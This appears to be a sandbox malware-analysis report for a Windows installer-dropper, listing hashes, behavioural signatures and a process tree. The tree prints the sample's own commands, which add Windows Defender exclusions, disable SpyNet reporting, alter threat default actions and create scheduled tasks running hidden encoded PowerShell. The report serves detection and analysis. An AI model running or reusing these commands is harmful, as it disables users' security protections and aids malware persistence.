Resubmissions

15/11/2024, 18:05 UTC

241115-wpjcdsxrdy 10

11/11/2024, 21:40 UTC

241111-1h6xbsxcql 10

03/12/2022, 17:54 UTC

221203-wg4ncscc33 10

Analysis

  • max time kernel
    150s
  • max time network
    156s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/11/2024, 21:40 UTC

General

  • Target

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe

  • Size

    6.3MB

  • MD5

    ded964e022a37d93d434091ec75f9881

  • SHA1

    e89a551ac1f19dc3838e21157667e2f98d84d06b

  • SHA256

    9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

  • SHA512

    13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

  • SSDEEP

    196608:91OEVXHF+E/eq7QuIUVUMxVuAK1X84eu/k9RD13q:3OEVV+tq7Q7U62AAi84VkF13q

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 3 IoCs
  • Indirect Command Execution 1 TTPs 2 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Drops file in System32 directory 29 IoCs
  • Drops file in Program Files directory 14 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 11 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 40 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe
    "C:\Users\Admin\AppData\Local\Temp\9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2172
    • C:\Users\Admin\AppData\Local\Temp\7zS8397.tmp\Install.exe
      .\Install.exe /S /site_id "525403"
      2⤵
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5092
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3232
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2392
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2508
      • C:\Windows\SysWOW64\forfiles.exe
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        3⤵
        • Indirect Command Execution
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2280
        • C:\Windows\SysWOW64\cmd.exe
          /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1084
          • \??\c:\windows\SysWOW64\reg.exe
            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
            5⤵
              PID:3740
            • \??\c:\windows\SysWOW64\reg.exe
              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
              5⤵
              • System Location Discovery: System Language Discovery
              PID:1164
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "gHjVnDyYo" /SC once /ST 04:35:42 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          3⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1744
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "gHjVnDyYo"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4008
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "gHjVnDyYo"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4452
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "bKwcWZekAnYWEgmozo" /SC once /ST 21:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\mUNDKqg.exe\" q8 /site_id 525403 /S" /V1 /F
          3⤵
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:436
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
      C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
      1⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\system32\gpupdate.exe
        "C:\Windows\system32\gpupdate.exe" /force
        2⤵
          PID:3596
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
        1⤵
          PID:3660
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
          1⤵
            PID:3040
          • C:\Windows\system32\gpscript.exe
            gpscript.exe /RefreshSystemParam
            1⤵
              PID:4896
            • C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\mUNDKqg.exe
              C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\mXQpfNlKnkevdXC\mUNDKqg.exe q8 /site_id 525403 /S
              1⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:3980
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                2⤵
                • Drops file in System32 directory
                • System Location Discovery: System Language Discovery
                • Modifies data under HKEY_USERS
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5092
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5108
                  • C:\Windows\SysWOW64\reg.exe
                    REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                    4⤵
                      PID:1692
                  • C:\Windows\SysWOW64\reg.exe
                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                    3⤵
                      PID:1968
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:4432
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1284
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:1236
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:3428
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                      3⤵
                      • System Location Discovery: System Language Discovery
                      PID:776
                    • C:\Windows\SysWOW64\reg.exe
                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                      3⤵
                        PID:3056
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:3300
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2400
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:868
                      • C:\Windows\SysWOW64\reg.exe
                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                        3⤵
                          PID:3188
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:528
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:4448
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:1168
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                          3⤵
                          • System Location Discovery: System Language Discovery
                          PID:2704
                        • C:\Windows\SysWOW64\reg.exe
                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                          3⤵
                            PID:2016
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4896
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                            3⤵
                            • System Location Discovery: System Language Discovery
                            PID:4260
                          • C:\Windows\SysWOW64\reg.exe
                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                            3⤵
                              PID:624
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                              3⤵
                              • System Location Discovery: System Language Discovery
                              PID:700
                            • C:\Windows\SysWOW64\reg.exe
                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                              3⤵
                                PID:2120
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4456
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:1360
                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RqtPwFqMTiUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UBqYudvSNocU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ZUXSmeDRU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\oXjeNNLqKAotC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xonCRuklPFipnPeqKpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hrOORTLiECQfZJVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\YSrBLfWUtIHnuviW\" /t REG_DWORD /d 0 /reg:64;"
                              2⤵
                              • Drops file in System32 directory
                              • System Location Discovery: System Language Discovery
                              • Modifies data under HKEY_USERS
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              PID:1476
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:2116
                                • C:\Windows\SysWOW64\reg.exe
                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:32
                                  4⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:4440
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RqtPwFqMTiUn" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4612
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:3688
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4020
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:684
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
                                3⤵
                                • System Location Discovery: System Language Discovery
                                PID:4512
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
                                3⤵
                                  PID:1460
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
                                  3⤵
                                  • System Location Discovery: System Language Discovery
                                  PID:3632
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
                                  3⤵
                                    PID:4484
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
                                    3⤵
                                    • System Location Discovery: System Language Discovery
                                    PID:3812
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:32
                                    3⤵
                                      PID:4912
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\hrOORTLiECQfZJVB /t REG_DWORD /d 0 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1560
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:32
                                      3⤵
                                        PID:4156
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu /t REG_DWORD /d 0 /reg:64
                                        3⤵
